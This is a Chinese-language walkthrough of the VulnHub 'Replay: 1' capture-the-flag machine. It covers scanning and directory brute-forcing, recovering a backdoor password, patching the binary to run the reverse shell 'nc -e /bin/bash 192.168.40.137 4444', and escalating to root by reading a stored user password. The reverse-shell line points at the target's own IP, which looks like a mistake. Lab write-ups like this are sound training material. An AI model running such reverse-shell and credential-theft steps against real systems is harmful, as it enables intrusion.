Replay_CTF靶機滲透

靶機環境

• 靶機(Linux): 192.168.40.137
• 攻擊機(Kali): 192.168.40.129

下載下傳位址:https://www.vulnhub.com/entry/replay-1,278/

滲透過程

按照慣例，得先找到對方IP，是以

nmap192.168.40.0/24

掃描一下

找到靶機的IP為192.168.40.137，開啟了兩個端口，ssh和http

打開網頁檢視一下

在源代碼中發現了一條注釋的内容，暫時不知道有什麼用，是以先放着

按照流程，接下來應該爆破目錄了

dirb http://192.168.40.137/ /usr/share/dirb/wordlist/comment.txt           

複制

找到網站是存在robots.txt這個檔案的

掃描子目錄的多少和字典有關系，有的robots.txt中會存在一些掃描不到的東西，是以還是有通路價值的），通路後發現根目錄下有一個

.zip

檔案

下載下傳下來後解壓，看到有兩個檔案

changelog.txt

是更新日志，先看一下網站的更新内容，打開檔案後發現檔案部分内容為base64編碼，拎去解碼後的明文如下

從4個版本中可以看到，這個作者在網站中建立了一個後門程式，用于他自己連接配接，這個後門程式是

python2.7

版本寫的，

寫死

成了

.bin

檔案，是以我們也可以順便利用一下，

./client.bin

後發現需要輸入密碼

用vim打開.bin檔案後，

/password

搜尋找到了2nd(第二部分)的密碼，故而猜測是和前面P1拼接在一起的，回頭複制粘貼拼接密碼

密碼：qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul           

複制

有了賬号密碼後，運作.bin檔案 輸入了IP和密碼後，發現執行了一條

whoami

指令，這部分應該是寫進.bin裡面的

是以vim進入

client.bin

，查找

whoami

找到了執行指令的這一部分，那麼就可以開始反彈shell了，因為是寫死的緣故，是以字元數量必須和之前的一樣，否則不能運作，就好比，100個字元的檔案，不論怎麼修改，最後都隻能100字元，否則就無法運作；那麼我們先構造反彈的語句

nc -e /bin/bash 192.168.40.137 4444           

複制

為了程式能正常運作，是以我們得把前面的一些字元串删除，以此來達到“平衡” 在Python中計算反彈語句的長度為

35

原先的指令

whoami

為6位，是以我們得向前删除29位，最後的樣子是這個

接着在Kali中開啟監聽

nc -lvp 4444           

複制

開啟完成後，運作後門程式，觸發shell

得到shell後，開始提權

在

/home/bob/Document/.ftp/

目錄下發現了一個

.user.passwd

cat檢視後，找到了bob的密碼，直接

sudu su

輸入密碼就切換成了root

最後，在根目錄下發現flag.txt，

cat flag.txt

擷取flag，完成

總結

這個靶機在進入系統後的提權簡直弱智，就像是為了增加這麼一個環節而強行增加上去的一樣，毫無技術含量，你能找得到檔案就能提權，找不到就萬年

bob

，前面後門程式部分還是挺有意思的

本文參與 騰訊雲自媒體分享計劃，歡迎熱愛寫作的你一起參與！

本文章分享自微信公衆号

E條鹹魚

作者：現在你看到我的ID了

原始發表時間：2019-05-09

如有侵權，請聯系 [email protected] 删除。